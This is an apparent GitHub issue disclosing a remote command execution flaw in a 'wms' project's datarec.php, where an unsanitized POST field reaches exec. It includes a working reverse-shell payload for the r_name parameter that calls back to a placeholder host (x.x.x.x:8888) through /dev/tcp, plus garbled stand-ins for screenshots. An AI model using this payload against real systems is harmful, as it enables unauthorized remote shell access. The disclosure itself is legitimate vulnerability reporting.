wms icon indicating copy to clipboard operation
wms copied to clipboard

Published 20 hours ago verified publisher icon FeMiner

Remote Command Execution vulnerability in /wms/src/system/datarec.php

Open leiyuyu041013 opened this issue 3 years ago • 1 comments

A RCE was found in system/datarec.php, the $_POST[r_name] is directly passed into the $mysqlstr, and is executed by exec, which causing a RCE.

2U7JWGK7X(EZH(N$FE%H52P

POC: Firstly, start a nc listener: U0 }2 ZX_1W3~R5`VW(VZ@D

Next, post a request with parameter: r_name=$(bash -c 'bash -i >& /dev/tcp/x.x.x.x/8888 0<&1 2>&1') CEJ17J 7`ZUFTTE}INOM$RG

Finally, you get the reverse shell: HRVEDK)LA`%4_BC5ELHJ0QY

leiyuyu041013 avatar Oct 18 '21 18:10 leiyuyu041013